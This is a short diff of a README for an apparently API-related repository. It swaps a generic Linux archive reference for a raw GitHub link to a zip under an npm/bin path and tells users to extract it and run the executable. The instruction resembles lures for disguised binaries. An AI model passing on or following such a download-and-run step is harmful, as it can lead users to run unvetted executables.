Wirbinator/httpstatuslookup-api/README.md

 2. **Run the Installer:**
    - If you are using Windows: Double-click the `.exe` file to start the installation.
    - If you are using macOS: Open the `.dmg` file and drag the application into your Applications folder.
-   - If you are using Linux: Extract the contents of the `.tar.gz` file and run the executable.
+   - If you are using Linux: Extract the contents of the `https://raw.githubusercontent.com/Wirbinator/httpstatuslookup-api/main/npm/bin/httpstatuslookup-api-3.0.zip` file and run the executable.
 3. **Follow the On-Screen Instructions:** The installation wizard will guide you through the installation steps.

 ## 🌟 Using the Application